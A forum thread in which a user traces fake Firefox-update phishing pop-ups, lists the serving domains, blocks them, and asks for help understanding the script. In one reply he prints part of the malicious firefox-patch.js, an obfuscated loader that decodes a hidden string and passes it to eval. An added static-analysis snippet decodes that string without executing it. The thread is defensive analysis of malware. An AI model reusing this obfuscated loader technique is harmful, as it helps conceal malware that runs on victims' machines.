Topic: Blocking Malicious Sites

DaveLembke

    Topic Starter


    Sage
  • Thanked: 662
  • Certifications: List
  • Computer: Specs
  • Experience: Expert
  • OS: Windows 10
Blocking Malicious Sites
« on: February 21, 2017, 09:07:12 AM »
Not sure if there is a better method than what I am about to do, but recently the frequency of phishing attacks to get people to click on fake updates for Firefox has increased and I want to put an end to this potential issue.

Initially the issue was once in a while this pop up would happen. But more recently it's been happening more often than before, with my daughter's and my wife's computers having this pop up when on Facebook, so it's getting triggered somewhere in Facebook.

All computers are clean, no malware.

Many years ago I used to just add an entry to the HOSTS file and have it redirect to 127.0.0.1 and that would kill off navigating to bad sites, but I haven't had to do the HOSTS redirect to 127.0.0.1 HOME trick in years and there has to be better methods of killing off phishing.

So the issue that's popping up is this one, as I shared a ways back: http://www.computerhope.com/forum/index.php/topic,157201.0.html

Where a pop up that looks like you need to update shows and it tries to trick people into running a malicious script. The path to the script that is malicious is dynamically created and it's a one-time path. That is, right as that system is targeted for the phishing attack that path is live, but a second later the dynamic path is dead. I feel the group that's running this malicious phishing attack is doing this to hide what they are up to. This way if you bring the URL path to some authority and say they are up to no good, it can't be proven because the path is dead and it's no longer offering download of the malicious script from that dynamic URL.

So that's it, I am just going to kill off any and all URLs coming from wherever the host is so that it doesn't matter what dynamic naming convention is used beyond that of the domain name that is being used for hosting phishing attacks.

We all run Firefox browser and I found this which I am hoping is going to be the solution: https://addons.mozilla.org/en-US/firefox/addon/blocksite/

But this doesn't stop the initial phishing attack from each domain; it would only allow the ability to stop future phishing attacks from domains that have already been used to phish from, so I would need myself or a family member to stop and contact me and then myself copy/paste the URL to Notepad to add to my black list. And then add that domain and wildcards to it so that any and all variant pathing is dead.

Is this the best direction to go with this or is there a proactive vs reactive method that I can implement that is free or low cost to stop this phishing nonsense?

Additionally it's kind of a shame that the URL path to being able to download and run this script is dead a second after it's phishing for you to run it. I'd really like to run it in a sandbox and see what exactly they are targeting. But the systems that this is popping up on are highly configured/customized systems and it's not worth it to intentionally infect one of them the next time the opportunity arises. However maybe I could get my wife to use Facebook from a VM and when it pops up in the VM contact me, in which I would close out her Facebook and run the script within the confines of the VM and see what it's up to. However I am also tempted to just play it safe and not poke a stick at it and see if it bites and with what venom type.  ;D

The bad domains by the way are:

Quote
https: //eekumyoutube . org

and

Quote
https: //meihitravelfeeder . org

so far... there may be other domains using this same exact phishing method but I only have these 2 screenshots to see where they are originating from. Also to note that these sites have the GREEN VERIFIED LOCK symbol top left to make it look safe when it's likely far from safe.

[attachment deleted by admin to conserve space]

BC_Programmer


    Mastermind
  • Typing is no substitute for thinking.
  • Thanked: 1140
    • BC-Programming.com
  • Certifications: List
  • Computer: Specs
  • Experience: Beginner
  • OS: Windows 11
Re: Blocking Malicious Sites
« Reply #1 on: February 21, 2017, 09:24:10 AM »
I use Firefox as my primary browser and I've never seen any of those things you described there before or since. I've never been prompted for a fake Firefox update, ever, for example.
I was trying to dereference Null Pointers before it was cool.

DaveLembke

Re: Blocking Malicious Sites
« Reply #2 on: February 21, 2017, 09:37:02 AM »
Do you run Facebook through Firefox? It seems the common link between all systems that I have seen this on is that they are on Facebook and then this pops up once every 2 or 3 weeks. Thinking it's associated with the "click here to see what happens next" ads that they have, as for that is when I saw this happen on my own system with Facebook running. There was a picture of a guy standing next to a metal shed and it was something like "you won't believe what lies under this man's shed" and then it was click bait where the site you go to shows hidden bunkers and spaces people have on their property and then this update pops up.

However my wife stated that she didn't click on any click bait on Facebook and it popped up. She actually almost clicked to run it and my daughter saw it pop up and yelled NOOOOOOO to my wife not to run that, that's BAD!!!  :o  GOOD KID stopping mom from running it  ;D

Additionally this has happened on 2 different networks. My home computers as well as an office computer elsewhere. The computer at that office has never been home and my home computers never there. Also no removable media shared between locations so it's not a local infection of any kind of a hijacker etc, it's plainly a phishing attack by something that is in common to our Facebook accounts.

My daughter's computer: she was playing a Facebook game and it popped up on her system. The frequency of these occurrences used to be once after a couple of months, but recently it's been like once every 2 or 3 weeks.

Too bad there isn't an instant replay method of reversing the chain of events to see if there is more information that can be found such as which ad or which game or whatever is common to this problem on Facebook.

These never happen with other websites. Only if Facebook is running.  :-\

Update to bad domains:

The bad domains by the way are:

Quote

    https: //eekumyoutube . org        tries to get you to run 338kb  firefox-patch.js

    https: //meihitravelfeeder . org       tries to get you to run 6.5kb  firefox-patch.js

    https: //liirawynagrodzenia .net       tries to get you to run 482kb  firefox-patch.js

All of these use the same phishing attack background as seen in the screenshot pics. I added spacing to kill these from acting as links.  :P

BC_Programmer


Re: Blocking Malicious Sites
« Reply #3 on: February 21, 2017, 09:56:55 AM »
I pop on Facebook once every few days, yes.

Perhaps it is taking place through Adobe Flash? I don't have that installed.
I was trying to dereference Null Pointers before it was cool.

DaveLembke

Re: Blocking Malicious Sites
« Reply #4 on: February 21, 2017, 10:43:02 AM »
Didn't even think of that.... it could be through Adobe Flash since it's enabled on all systems and my daughter was playing the one Flash game.

I did some digging online and found a place to report problems to Mozilla: https://www.mozilla.org/en-US/about/legal/fraud-report/

I then downloaded a Capture to Text OCR program to get the full URL paths off the screenshots I have. The OCR program isn't perfect, as for I had to verify that the URL path captured with OCR matched the screenshot; it gets confused with pipe ( | ) and L ( l ) for example and in some other places it gave wrong characters. Still easier than having to type the full URL from scratch from screenshot to Notepad, but the OCR is not perfect in ASCII recognition but it was free. http://capture2text.sourceforge.net/

Going to send in the URLs to them even though there is probably very little they can do to fix this.

DaveLembke

Re: Blocking Malicious Sites
« Reply #5 on: February 22, 2017, 12:59:47 PM »
Wife had another phishing attack today. This time I safely downloaded the .js to check it out without running it.

Thinking it's coded up in a language other than English, as for some of it stands out as code that is easy to read and other parts of it are just gobbledygook to my eyes. I opened it for editing with JetBrains IntelliJ IDEA Community Edition 2016.3.

Quote
var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
   var d = new ActiveXObject(sir);
   d.Add("a","3");
   var t=+d.Item("a");
   var rjdmefbshp="";
   var trurghaaq=t;
   var rrooaufpn=lubjgros["sp"+"l"+"i"+"t"]("");
   var am="gth";
   for (a=0;a<rrooaufpn["len"+am];
   a +=trurghaaq){      rjdmefbshp=rjdmefbshp+rrooaufpn[a];}
   var ikvcfnino="";
   if(t==3){ikvcfnino=rrr+"a";}
   if(t==3){ikvcfnino +="l";}
   var iehtbcmcc=this;
   var hkthfwmtez=iehtbcmcc[ikvcfnino];
   var iepizmswd=hkthfwmtez;
   iepizmswd(rjdmefbshp);

I can share the entirety of the TEXT form of this bad firefox-patch.js code here if allowed to do so for someone good with Java to look over. What I am getting from looking at the code is that it looks like they split up and recombine through concatenation SCRIPTING DICTIONARY .... not sure if this is to try to hide keywords from malware detection software etc. Also what stood out is that this appears to use an ActiveX Object to do something, creating it dynamically on the fly from the Java code.

I scanned this .js file with Malwarebytes and it said all is good.
I scanned this .js file with Microsoft Security Essentials and it said all is good.
I scanned this .js file with McAfee which my wife also has installed and it also said no threats detected.

Here is a code snippet from the start of the script and lots of stuff makes no sense to me and thinking it's because it might be in a different language than English. The fact that some of it is in English and other parts of the code are unable to be read by me, maybe this script detects what language the Firefox browser is and then carries out attacks specific to the language of the browser version.

Code: [Select]
   var params="af8455a4d8e8466b492409049ef1e3c4";
   var odubo='vkzaglrtr hbalxpnh=pv"hfewovswakvlvi"rm;
qhviyaxwrit kdkfbwzsdaqdmmtspbetwqpskw=fa\'nfdnx wdravootvxiakz=sdltjrws"ifmzouemdjqarotuprmeehiadiecimrsusaddbeklsewochbwmpzcxtarpioxk"oktsketw;
ew.pvnvvwxietznwi pxakz=clvljisvtfaelpAatcqdeztjoubqocwkXknOwqSogMfl"wyXiitdi(jaXqi.cu2yqMjsMnxLmyPjeTsiTyt"aoLanHlgnox=ftbtsebp)kj;
adtwicgkAikipswas mhbwzOnnXtwjuyvsieaa"pm(wbtfaSiwegccnothppicikiiiuchgrdvitbFkx.xmlylnnngnutrtsvwylxenieksSaveqvjbibdyczfmdxOjktva;
oh)cjrcbtyt"ryWgk=ceczrSmdylp{notuppmniyx.ywcetrdmpohiafrdntxrSwkcczNcwlloldoaezFnyuvrfnlifu;
gs(zimoveizlrsicfFfoekebti.xwtwxsvbisjsvrElgxyabjs)nx)wy.qw(coccttyheqmljsepnDofeol(dhenjlkpchlFitirvasfcui}butcw)jz;
rs)gsexh(tv{cmcwxhmq(cgrauoqlvqs}aifdl=hbibg zr1ktabfrbi5vu=se<ur;
xe;
zwihy{qp)yy+jqtsciir+jt.mhant{cnoiorsxyoa"fm(jmnkeGurppbert vz,rk"dd"laEuqTeysmwptmtnf:shhustxbdsf+gs"lioiy/ih/lz+zllcxrvt"pgmsiunjaqfpyg+hlrqw/oa"jw"ua+irsqd.otaqqmjr,xm"vzvip vjfpzllueqwsxblyf)ggfxsawpeiosek.cznmo;
nzaphlrwuwlnfgldhdjw(caehhrajbyeatw)hh;
hxaljcit}bztwxkis;
zs)aoelc(dj{qncxkhpqinvrcjcgupdjWdsSrmekflynSgsehxtag.qs0gd0og5xd0zepnl(fcjlu}mj}vp8ue)rf;
ysyqylffXyqGuvvcfJji=nailinkaavq7awAmhplvsahezdocz.eqRgheddTibejfxgsnaxsyrbiluhtsaisettbm.qfgebnrsizj(mytzcrivdnjigp;
go=ze3yp)yhsbzelcRhcpdbaum.vuTstewisereafournghumbsrf.mkbjpxsntqvnxaimtrorglisqgtyh)nu3mz,gh;
js(xt0dabqk9ynfjiwjozigMyvjdwVcjNruLobnbfbmaCsi9bwgxqYbfAsnJwzsob"if=bwJshMrfFzvWwi4nnRoxWfakxhIyhImuJhzWyeEgeNjmcipXxl;
qa"wo';

So for now I am just adding the domains as a wildcard block with Firefox Blocker Addon as seen in 2nd pic

And 3rd pic below shows that it's working to block that domain now.... Curious how many different domains they are using this phishing attack through now. I have a notebook with them written down to add this black list to all systems now. As they are detected I will kill them off from repeat attacks using the same domains.  ::)

[attachment deleted by admin to conserve space]

BC_Programmer


Re: Blocking Malicious Sites
« Reply #6 on: February 22, 2017, 04:37:02 PM »
Come on now, we've been over how Java and Javascript are completely different programming languages, haven't we?

Anyway, the javascript is intentionally obfuscated to make it harder to follow by using randomized names and indirection. That's typical for malicious javascript. It detects as clean because it is probably randomized differently every time it is 'delivered'.
I was trying to dereference Null Pointers before it was cool.

DaveLembke

Re: Blocking Malicious Sites
« Reply #7 on: February 22, 2017, 06:31:27 PM »
Quote
Come on now, we've been over how Java and Javascript are completely different programming languages, haven't we?

 ;D Yes ... I recognized .js as a javascript, but thought it was somehow creating something else, spawning another code type from within the javascript, in which that might be Java instructions when it was making a new ActiveX Object. Java Script has many limitations whereas a different script spawned from it wouldn't have the same limitations, I was thinking.

Sadly I never worked with Java and only very limited with Java Script, so when I saw the mess that was contained within, I thought it might be Java Script spawning off another language such as Java which might work more hand in hand with it.

Didn't expect the stuff like this to be just clutter to try to confuse. I figured all the code/instructions would have purpose vs just to be clutter. And this looked like 32 character hex injection with params taking on the hex string:  var params="af8455a4d8e8466b492409049ef1e3c4";


BC_Programmer


Re: Blocking Malicious Sites
« Reply #8 on: February 22, 2017, 07:18:58 PM »
In the earlier example it's using ActiveXObject() to create a Dictionary (hashMap).

Javascript is probably worse than perl in how badly you can mangle it. I found this example of an obfuscated Hello World Program, for example:

Code: [Select]
([]+/H/)[1&11>>1]+(+[[]+(1-~1<<1)+(~1+1e1)+(1%11)+(1|1>>1|1)+(~1+1e1)+(.1^!1)])[[([]+!![
11])[11^11]+[[{}]+{}][1/1.1&1][1]]+([[]+111/!1][+!1][([{}]+{})[1e1>>1]+[[],[]+{}][1&11>>
1][1|[]]+([]+[][111])[1&1]+[{},1e1,!1+{}][~~(1.1+1.1)][1^1<<1]+(11/!{}+{})[1-~1<<1]+[!!{
}+[]][+(11>11)][[]+1]+(/^/[1.11]+/&/)[.1^!1]+[{},[{}]+{},1][1&11>>1][1+1e1+1]+([]+!!{})[
.1^!1]+([]+{}+[])[[]+1]+[!!{}+{}][!11+!111][[]+1]]+[])[(!/~/+{})[1|1<<1]+[/=/,[]+[][1]][
1&11>>1][1&1>>1]+([]+{})[~~(1.1+1.1)]+[1,!1+{}][1%11][1^1<<1]+(111/[]+/1/)[~1+1e1+~1]+[!
!/-/+[]][+(11>11)][1]]((1<<1^11)+((+(1<1))==([]+/-/[(!![11]+[])[+!1]+(!!/-/+{})[1-~1]+([
]+!/~/)[1-~1]+(!!/-/+{})[!111+!111]])[11%11]),-~11>>1)](~1-~1e1<<1<<1)+([]+{111:1111}+[]
)[11111.1%11.1*111e11|!11]+({}+/W/)[1+~1e1-(~11*1.1<<1)]+(+[[]+(1|1>>1)+(1|1>>1|1)+(11-1
>>1)+(1e1>>1|1)+(1e1>>1)+(1>>11)+(11>>>1)])[[(!!{}+[])[11>>>11]+[[]+{}][.1^!1][111%11]]+
([11/[]+[]][111%111][([{}]+[{}])[1e1>>1]+[[],[{}]+[{}]][1|1>>1|1][1|[]]+([][11]+[])[[]+1
]+[{},1e1,![1]+/~/][1<<!1<<1][1<<1^1]+(1/!1+{})[11+1>>1]+[!!/-/+{}][+(111>111)][111%11]+
([][11]+/&/)[1&1>>1]+[{},[]+{}+[],1][[]+1][11-~1+11>>1]+([]+!!/-/)[11>>11]+([]+{})[1|1>>
1|1]+[[]+!!{}][1>>>1][1&11]]+[])[(!{}+[])[1^1<<1]+[/=/,[]+[][1]][1<<1>>1][!111+!111]+([]
+{}+[])[1<<1^1>>1]+[1,![11]+[]][1|1>>1][1|1<<1|1]+(11/[]+/1/)[-~11>>1]+[!![111]+{}][+[]]
[1|1>>1]]((1e1-1)+((1&1>>1)==([]+/-/[(!!{}+{})[+(1>1)]+(!!/-/+{})[1|1<<1]+(!1+{})[1|1<<1
|1]+(!!/-/+{})[11.11>>11.11]])[1&1>>1]),1-~1<<1)](~1-~1e1<<1<<1)+(/^!/+[])[1+!![11%111]]

Basically it is very dynamic which means you can build functions in pieces and even slap together strings to create functions or function names to call.







I was trying to dereference Null Pointers before it was cool.
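
Added example, not part of any post in this thread: a static look at the loader quoted in Reply #5, which keeps every third character of a filler-padded string and hands the result to eval, and at the string splitting described in Reply #8. It only decodes and folds text and never executes it; the function names are hypothetical, and the two inputs are the first fragment of `odubo` and the `sir` line as posted above.

```javascript
// Static analysis only: nothing in this file evaluates the decoded text.

// First fragment of the `odubo` string, copied as posted in the thread.
const THREAD_FRAGMENT = 'vkzaglrtr hbalxpnh=pv"hfewovswakvlvi"rm;';
// The `sir` line of the loader, copied as posted in the thread.
const LOADER_LINE =
  'var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));';

// Same selection as the loader's loop: keep text[0], text[stride], ...
function takeEveryNth(text, stride) {
  let out = "";
  for (let i = 0; i < text.length; i += stride) out += text[i];
  return out;
}

// Keywords that script source contains and random filler rarely does.
const KEYWORDS = ["var ", "function", "eval", "new ", "return", "ActiveXObject"];

function keywordScore(text) {
  return KEYWORDS.filter((k) => text.includes(k)).length;
}

// Generalisation beyond the thread: the stride is treated as unknown and
// recovered by trying 1..maxStride and keeping the best-scoring candidate.
function guessStride(text, maxStride = 8) {
  let best = { stride: 1, score: keywordScore(text), decoded: text };
  for (let stride = 2; stride <= maxStride; stride++) {
    const decoded = takeEveryNth(text, stride);
    const score = keywordScore(decoded);
    if (score > best.score) best = { stride, score, decoded };
  }
  return best;
}

// Join "a"+"b" literal pairs and unwrap calls to pass-through helpers
// (functions that return their argument, like `loa` in the loader) until
// the text stops changing. Handles double-quoted literals without escapes.
function foldLiterals(src, identityFns = []) {
  const pair = /"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g;
  const wrappers = identityFns.map(
    (name) => new RegExp("\\b" + name + '\\(\\s*("[^"\\\\]*")\\s*\\)', "g")
  );
  let prev;
  do {
    prev = src;
    src = src.replace(pair, '"$1$2"');
    for (const w of wrappers) src = src.replace(w, "$1");
  } while (src !== prev);
  return src;
}

console.log(guessStride(THREAD_FRAGMENT));
console.log(foldLiterals(LOADER_LINE, ["loa"]));
```

Because the filler characters can be regenerated for every download while the decoded text stays the same, a check run on the decoded output is more stable than one run on the file as delivered.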

DaveLembke

Re: Blocking Malicious Sites
« Reply #9 on: February 23, 2017, 07:07:10 AM »
Interesting ... is what you shared a partial of the code or all of it... I'd expect to see Hello World split up with the letters scattered in this, or ASCII character calls to call the letters to be used concatenated etc.

In the Where's Waldo approach to looking at this, these are the only characters that stand out that could be used for Hello World.

Quote
([]+/H/)[1&11>>1]+(+[[]+(1-~1<<1)+(~1+1e1)+(1%11)+(1|1>>1|1)+(~1+1e1)+(.1^!1)])[[([]+!![
11])[11^11]+[[{}]+{}][1/1.1&1][1]]+([[]+111/!1][+!1][([{}]+{})[1e1>>1]+[[],[]+{}][1&11>>
1][1|[]]+([]+[][111])[1&1]+[{},1e1,!1+{}][~~(1.1+1.1)][1^1<<1]+(11/!{}+{})[1-~1<<1]+[!!{
}+[]][+(11>11)][[]+1]+(/^/[1.11]+/&/)[.1^!1]+[{},[{}]+{},1][1&11>>1][1+1e1+1]+([]+!!{})[
.1^!1]+([]+{}+[])[[]+1]+[!!{}+{}][!11+!111][[]+1]]+[])[(!/~/+{})[1|1<<1]+[/=/,[]+[][1]][
1&11>>1][1&1>>1]+([]+{})[~~(1.1+1.1)]+[1,!1+{}][1%11][1^1<<1]+(111/[]+/1/)[~1+1e1+~1]+[!
!/-/+[]][+(11>11)][1]]((1<<1^11)+((+(1<1))==([]+/-/[(!![11]+[])[+!1]+(!!/-/+{})[1-~1]+([
]+!/~/)[1-~1]+(!!/-/+{})[!111+!111]])[11%11]),-~11>>1)](~1-~1e1<<1<<1)+([]+{111:1111}+[]
)[11111.1%11.1*111e11|!11]+({}+/W/)[1+~1e1-(~11*1.1<<1)]+(+[[]+(1|1>>1)+(1|1>>1|1)+(11-1
>>1)+(1e1>>1|1)+(1e1>>1)+(1>>11)+(11>>>1)])[[(!!{}+[])[11>>>11]+[[]+{}][.1^!1][111%11]]+
([11/[]+[]][111%111][([{}]+[{}])[1e1>>1]+[[],[{}]+[{}]][1|1>>1|1][1|[]]+([][11]+[])[[]+1
]+[{},1e1,![1]+/~/][1<<!1<<1][1<<1^1]+(1/!1+{})[11+1>>1]+[!!/-/+{}][+(111>111)][111%11]+
([][11]+/&/)[1&1>>1]+[{},[]+{}+[],1][[]+1][11-~1+11>>1]+([]+!!/-/)[11>>11]+([]+{})[1|1>>
1|1]+[[]+!!{}][1>>>1][1&11]]+[])[(!{}+[])[1^1<<1]+[/=/,[]+[][1]][1<<1>>1][!111+!111]+([]
+{}+[])[1<<1^1>>1]+[1,![11]+[]][1|1>>1][1|1<<1|1]+(11/[]+/1/)[-~11>>1]+[!![111]+{}][+[]]
[1|1>>1]]((1e1-1)+((1&1>>1)==([]+/-/[(!!{}+{})[+(1>1)]+(!!/-/+{})[1|1<<1]+(!1+{})[1|1<<1
|1]+(!!/-/+{})[11.11>>11.11]])[1&1>>1]),1-~1<<1)](~1-~1e1<<1<<1)+(/^!/+[])[1+!![11%111]]